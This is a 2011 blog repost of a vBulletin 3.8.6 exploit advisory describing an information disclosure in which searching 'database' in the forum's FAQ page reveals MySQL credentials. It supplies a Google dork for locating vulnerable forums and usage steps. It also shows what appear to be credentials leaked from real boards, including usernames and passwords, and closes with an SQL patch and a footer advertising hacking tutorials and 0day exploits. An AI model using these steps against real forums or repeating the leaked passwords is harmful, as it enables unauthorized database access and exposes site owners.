Saturday, August 6, 2011
010101010101010101010101010101010101010101010101010101010
1 Iranian Datacoders Security Team 2010 |
010101010101010101010101010101010101010101010101010101010 |
#
Original Advisory:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html |
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded |
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability |
# Software Link: http://www.vbulletin.com/ |
# Google dork : powered by vBulletin 3.8.6 |
# Platform / Tested on: linux |
# Category: webapplications |
#BUG:######################################################################### |
Is
perhaps one or the other known, but I find that really interesting that
a great and mighty forum software like vBulletin can undermine the
mistake that the MySQL password for any person to be visible. |
The issue has been published this afternoon and vBulletin responded with a patch on it. |
The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases. |
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting: |
################################################################################################## |
config['Database']['dbname']} |
Database Host: {$vbulletin->config['MasterServer']['servername']} |
Database Port: {$vbulletin->config['MasterServer']['port']} |
Database Username: {$vbulletin->config['MasterServer']['username']} |
Database Password: {$vbulletin->config['MasterServer']['password']}]]> |
################################################################################################## |
How do I use this from now? |
We
look for a forum, which is affected by this vulnerability, click above
on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then
"Database" |
(or database) and a then see, aha, first hit: |
################################################################################################## |
Datenbank-Name: XXXXXXXXX |
Datenbank-Server: localhost |
Datenbank-Benutzername: root |
Datenbank-Kennwort: my4moo |
################################################################################################## |
Respectively English beeen at a board: |
################################################################################################## |
Database Name: pro_aXXXXXXXXXg_com |
Database Username: pro_aXXXXXXXXXg |
Database Password: gitl0st |
################################################################################################## |
On what to do with it, I think I need not dwell on it. |
As already posted a patch from the official vBulletin site, or by a MySQL query: |
################################################################################################## |
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo' |
################################################################################################## |
################################################################################################## |
################################################################################################## |
############################################################################# |
Our Website : http://www.datacoders.ir |
Special Thanks to : ccC0d3rZzz & all iranian datacoders members |
#############################################################################
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -